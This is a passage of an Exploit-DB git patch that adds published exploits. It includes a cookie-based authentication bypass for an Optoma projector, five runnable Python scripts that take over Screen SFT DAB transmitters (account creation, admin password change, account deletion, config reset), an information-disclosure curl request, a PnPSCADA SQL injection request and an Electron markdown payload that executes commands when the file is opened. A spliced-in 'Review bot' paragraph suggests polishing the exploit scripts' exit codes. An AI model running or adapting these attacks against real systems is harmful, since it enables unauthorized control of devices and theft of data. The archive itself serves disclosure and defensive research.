From 0a7adaa3fcdd8a907b3f89e0fdfc59ab67f6ffab Mon Sep 17 00:00:00 2001 
From: Exploit-DB <gitlab@exploit-db.com> Date: Wed, 24 May 2023 00:16:34 +0000 Subject: [PATCH] DB: 2023-05-24 40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 
1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated) --- exploits/hardware/remote/51444.txt | 23 ++++ exploits/hardware/remote/51455.py | 102 +++++++++++++++ exploits/hardware/remote/51456.py | 102 +++++++++++++++ exploits/hardware/remote/51457.py | 94 ++++++++++++++ exploits/hardware/remote/51458.py | 96 +++++++++++++++ exploits/hardware/remote/51459.py | 93 ++++++++++++++ exploits/hardware/remote/51460.txt | 45 +++++++ exploits/hardware/webapps/51448.txt | 22 ++++ exploits/multiple/local/51469.txt | 25 ++++ exploits/multiple/local/51470.txt | 28 +++++ exploits/multiple/webapps/51447.py | 105 ++++++++++++++++ exploits/multiple/webapps/51452.py | 115 +++++++++++++++++ exploits/multiple/webapps/51480.txt | 30 +++++ exploits/php/webapps/51436.py | 12 +- exploits/php/webapps/51443.txt | 124 +++++++++++++++++++ exploits/php/webapps/51445.txt | 38 ++++++ exploits/php/webapps/51449.txt | 150 +++++++++++++++++++++++ exploits/php/webapps/51450.php | 84 +++++++++++++ exploits/php/webapps/51451.txt | 28 +++++ exploits/php/webapps/51454.txt | 184 ++++++++++++++++++++++++++++ exploits/php/webapps/51462.py | 148 ++++++++++++++++++++++ exploits/php/webapps/51463.txt | 20 +++ exploits/php/webapps/51464.txt | 63 ++++++++++ exploits/php/webapps/51465.txt | 45 +++++++ exploits/php/webapps/51468.txt | 28 +++++ exploits/php/webapps/51471.txt | 45 +++++++ exploits/php/webapps/51472.txt | 43 +++++++ exploits/php/webapps/51473.txt | 34 +++++ exploits/php/webapps/51474.txt | 36 ++++++ exploits/php/webapps/51475.py | 140 +++++++++++++++++++++ exploits/php/webapps/51476.txt | 64 ++++++++++ exploits/php/webapps/51477.txt | 17 +++ exploits/php/webapps/51478.txt | 27 ++++ exploits/ruby/webapps/51446.txt | 55 +++++++++ exploits/windows/local/51453.txt | 
91 ++++++++++++++ exploits/windows/local/51461.txt | 48 ++++++++ exploits/windows/local/51479.txt | 53 ++++++++ exploits/windows/webapps/51466.txt | 23 ++++ exploits/windows/webapps/51467.txt | 19 +++ files_exploits.csv | 40 +++++- 40 files changed, 2532 insertions(+), 7 deletions(-) create mode 100644 exploits/hardware/remote/51444.txt create mode 100755 exploits/hardware/remote/51455.py create mode 100755 exploits/hardware/remote/51456.py create mode 100755 exploits/hardware/remote/51457.py create mode 100755 exploits/hardware/remote/51458.py create mode 100755 exploits/hardware/remote/51459.py create mode 100644 exploits/hardware/remote/51460.txt create mode 100644 exploits/hardware/webapps/51448.txt create mode 100644 exploits/multiple/local/51469.txt create mode 100644 exploits/multiple/local/51470.txt create mode 100755 exploits/multiple/webapps/51447.py create mode 100755 exploits/multiple/webapps/51452.py create mode 100644 exploits/multiple/webapps/51480.txt create mode 100644 exploits/php/webapps/51443.txt create mode 100644 exploits/php/webapps/51445.txt create mode 100644 exploits/php/webapps/51449.txt create mode 100644 exploits/php/webapps/51450.php create mode 100644 exploits/php/webapps/51451.txt create mode 100644 exploits/php/webapps/51454.txt create mode 100755 exploits/php/webapps/51462.py create mode 100644 exploits/php/webapps/51463.txt create mode 100644 exploits/php/webapps/51464.txt create mode 100644 exploits/php/webapps/51465.txt create mode 100644 exploits/php/webapps/51468.txt create mode 100644 exploits/php/webapps/51471.txt create mode 100644 exploits/php/webapps/51472.txt create mode 100644 exploits/php/webapps/51473.txt create mode 100644 exploits/php/webapps/51474.txt create mode 100755 exploits/php/webapps/51475.py create mode 100644 exploits/php/webapps/51476.txt create mode 100644 exploits/php/webapps/51477.txt create mode 100644 exploits/php/webapps/51478.txt create mode 100644 exploits/ruby/webapps/51446.txt create mode 100644 
exploits/windows/local/51453.txt create mode 100644 exploits/windows/local/51461.txt create mode 100644 exploits/windows/local/51479.txt create mode 100644 exploits/windows/webapps/51466.txt create mode 100644 exploits/windows/webapps/51467.txt
diff --git a/exploits/hardware/remote/51444.txt b/exploits/hardware/remote/51444.txt
new file mode 100644
index 000000000..598268172
--- /dev/null
+++ b/exploits/hardware/remote/51444.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass
+# Date: 2023/05/09
+# Exploit Author: Anthony Cole
+# Contact: http://twitter.com/acole76
+# Website: http://twitter.com/acole76
+# Vendor Homepage: http://optoma.com
+# Version: Optoma 1080PSTX Firmware C02
+# Tested on: N/A
+# CVE : CVE-2023-27823
+
+Details
+By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".
+
+GET /index.asp HTTP/1.1
+Host: projector
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: atop=1
+Connection: close
\ No newline at end of file
diff --git a/exploits/hardware/remote/51455.py b/exploits/hardware/remote/51455.py
new file mode 100755
index 000000000..086a45150
--- /dev/null
+++ b/exploits/hardware/remote/51455.py
@@ -0,0 +1,102 @@ +#!/usr/bin/env python3 +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: The application suffers from a weak session management that can +# allow an attacker on the same network to bypass these controls by reusing +# the same IP address assigned to the victim user (NAT) and exploit crucial +# operations on the device itself. By abusing the IP address property that +# is binded to the Session ID, one needs to await for such an established +# session and issue unauthorized requests to the vulnerable API to manage +# and/or manipulate the affected transmitter. 
+# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5771 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +u=input('Enter desired username: ') +p=input('Enter desired password: ') +e='/system/api/userManager.cgx' +m5=hashlib.md5() +m5.update(p.encode('utf-8')) +h=m5.hexdigest() +print('Your sig:',h) +print('Calling object: ssbtObj') +print('CGX fastcall: userManager::newUser') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber++', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'userManager', + 'ssbtObj':{ + 'newUser':{ + 'password':h, + 'type':'OPERATOR', + 'username':u + } + }, + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-5) \ No newline at end of file 
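Review bot: The script ends with an unconditional `exit(-5)` on the hunk's last line, so the process reports failure even after the `print('Done.')` branch; on POSIX a negative code is presumably wrapped (251), which makes the status unusable from a shell or a wrapper script. The same trailing pattern closes 51456.py (`exit(-4)`), 51457.py (`exit(-3)`), 51458.py (`exit(-2)`) and 51459.py (`exit(-1)`). Deriving the status from the branch, `raise SystemExit(0 if r.status_code==200 else 1)`, keeps the intent and fixes all five; `raise SystemExit` is also preferable to the `exit` helper, which is installed by the `site` module and is not guaranteed under `python -S`. The `import hashlib,datetime##########` style of trailing `#` padding on the import lines is decorative and would normally be dropped or replaced by a real comment.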
diff --git a/exploits/hardware/remote/51456.py b/exploits/hardware/remote/51456.py new file mode 100755 index 000000000..bb87cc5e3 --- /dev/null +++ b/exploits/hardware/remote/51456.py 
@@ -0,0 +1,102 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: The application suffers from a weak session management that can +# allow an attacker on the same network to bypass these controls by reusing +# the same IP address assigned to the victim user (NAT) and exploit crucial +# operations on the device itself. By abusing the IP address property that +# is binded to the Session ID, one needs to await for such an established +# session and issue unauthorized requests to the vulnerable API to manage +# and/or manipulate the affected transmitter. 
+# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5772 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +u=input('Enter desired username: ') +p=input('Enter desired password: ') +e='/system/api/userManager.cgx' +m5=hashlib.md5() +m5.update(p.encode('utf-8')) +h=m5.hexdigest() +print('Your sig:',h) +print('Calling object: ssbtObj') +print('CGX fastcall: userManager::changeUserPswd') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber+', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'userManager', + 'ssbtObj':{ + 'changeUserPswd':{ + 'username':u, + 'password':h + } + }, + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-4) \ No newline at end of file 
diff --git a/exploits/hardware/remote/51457.py b/exploits/hardware/remote/51457.py new file mode 100755 index 000000000..4e46b9247 --- /dev/null +++ b/exploits/hardware/remote/51457.py 
@@ -0,0 +1,94 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: The application suffers from a weak session management that can +# allow an attacker on the same network to bypass these controls by reusing +# the same IP address assigned to the victim user (NAT) and exploit crucial +# operations on the device itself. By abusing the IP address property that +# is binded to the Session ID, one needs to await for such an established +# session and issue unauthorized requests to the vulnerable API to manage +# and/or manipulate the affected transmitter. 
+# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5773 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +u=input('Enter desired username: ') +e='/system/api/userManager.cgx' +print('Calling object: ssbtObj') +print('CGX fastcall: userManager::removeUser') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber-', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'userManager', + 'ssbtObj':{ + 'removeUser':u + } + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-3) \ No newline at end of file diff --git a/exploits/hardware/remote/51458.py b/exploits/hardware/remote/51458.py new file mode 100755 index 000000000..ea2c28943 --- /dev/null +++ b/exploits/hardware/remote/51458.py 
@@ -0,0 +1,96 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: This exploit circumvents the control and requirement of admin's +# old password and directly changes the password. +# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5774 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. 
+ We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +p=input('Enter desired password: ') +e='/system/api/userManager.cgx' +m5=hashlib.md5() +m5.update(p.encode('utf-8')) +h=m5.hexdigest() +print('Your sig:',h) +print('Calling object: ssbtObj') +print('CGX fastcall: userManager::changeUserPswd') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber-+', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'userManager', + 'ssbtObj':{ + 'changeUserPswd':{ + 'username':'admin', + 'password':h + } + }, + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-2) \ No newline at end of file diff --git a/exploits/hardware/remote/51459.py b/exploits/hardware/remote/51459.py new file mode 100755 index 000000000..39cbf1304 --- /dev/null +++ b/exploits/hardware/remote/51459.py 
@@ -0,0 +1,93 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: The application suffers from a weak session management that can +# allow an attacker on the same network to bypass these controls by reusing +# the same IP address assigned to the victim user (NAT) and exploit crucial +# operations on the device itself. By abusing the IP address property that +# is binded to the Session ID, one needs to await for such an established +# session and issue unauthorized requests to the vulnerable API to manage +# and/or manipulate the affected transmitter. 
+# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5775 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +e='/system/api/deviceManagement.cgx' +print('Calling object: ssbtObj') +print('CGX fastcall: deviceManagement::reset') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber--', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'deviceManagement', + 'ssbtObj':{ + 'reset':'true' + } + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-1) \ No newline at end of file diff --git a/exploits/hardware/remote/51460.txt b/exploits/hardware/remote/51460.txt new file mode 100644 index 000000000..879b81ead --- /dev/null +++ b/exploits/hardware/remote/51460.txt 
@@ -0,0 +1,45 @@
+# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
+# Exploit Author: LiquidWorm
+
+Vendor: DB Elettronica Telecomunicazioni SpA
+Product web page: https://www.screen.it | https://www.dbbroadcast.com
+ https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+Affected version: Firmware: 1.9.3
+ Bios firmware: 7.1 (Apr 19 2021)
+ Gui: 2.46
+ FPGA: 169.55
+ uc: 6.15
+
+Summary: Screen's new radio DAB Transmitter is reaching the highest
+technology level in both Digital Signal Processing and RF domain.
+SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+digital adaptive precorrection and configuatio flexibility, the Hot
+Swap System technology, the compactness and the smart system design,
+the SFT DAB are advanced transmitters. They support standards DAB,
+DAB+ and T-DMB and are compatible with major headend brands.
+
+Desc: Screen is affected by an information disclosure vulnerability
+due to improper access control enforcement. An unauthenticated remote
+attacker can exploit this, via a specially crafted request to gain
+access to sensitive information including usernames and source IP
+addresses.
+
+Tested on: Keil-EWEB/2.1
+ MontaVista® Linux® Carrier Grade eXpress (CGX)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5776
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php
+
+
+19.03.2023
+
+--
+
+
+$ curl 'http://SFTDAB/system/api/userManager.cgx'
+{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51448.txt b/exploits/hardware/webapps/51448.txt
new file mode 100644
index 000000000..2bb6425fa
--- /dev/null
+++ b/exploits/hardware/webapps/51448.txt
@@ -0,0 +1,22 @@
+# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
+# Date: 15/5/2023
+# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
+# Vendor Homepage: https://pnpscada.com/
+# Version: PnPSCADA (cross platforms): v2.x
+# Tested on: Unix
+# CVE : CVE-2023-1934
+# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8
+
+SQLi crashing point:
+
+GET /hitlogcsv.isp?userids=1337'&startdate=
+2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
+HTTP/1.1
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
+AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
+Safari/534.14
+Host: vulnerablepnpscada.int
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
\ No newline at end of file
diff --git a/exploits/multiple/local/51469.txt b/exploits/multiple/local/51469.txt
new file mode 100644
index 000000000..b699fb0c4
--- /dev/null
+++ b/exploits/multiple/local/51469.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
+# Date: 2023-04-24
+# Exploit Author: 8bitsec
+# CVE: CVE-2023-31873
+# Vendor Homepage: https://github.com/mariuskueng/gin
+# Software Link: https://github.com/mariuskueng/gin
+# Version: 0.7.4
+# Tested on: [Mac OS 13]
+
+Release Date:
+
+2023-04-24
+
+Product & Service Introduction: Javascript Markdown editor for Mac
+
+Technical Details & Description:
+A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.
+
+Proof of Concept (PoC):
+Arbitrary code execution:
+
+Create a markdown file (.md) in any text editor and write the following payload:
+<video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
+
+Opening the file in Gin will auto execute the Calculator application.
\ No newline at end of file
diff --git a/exploits/multiple/local/51470.txt b/exploits/multiple/local/51470.txt
new file mode 100644
index 000000000..2328e25e0
--- /dev/null
+++ b/exploits/multiple/local/51470.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
+# Date: 2023-04-27
+# Exploit Author: 8bitsec
+# CVE: CVE-2023-31874
+# Vendor Homepage: yank-note.com
+# Software Link: https://github.com/purocean/yn
+# Version: 3.52.1
+# Tested on: [Ubuntu 22.04 | Mac OS 13]
+
+Release Date: 2023-04-27
+
+Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement
+
+Technical Details & Description:
+
+A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.
+
+Proof of Concept (PoC):
+Arbitrary code execution:
+
+Create a markdown file (.md) in any text editor and write the following payload.
+Mac:
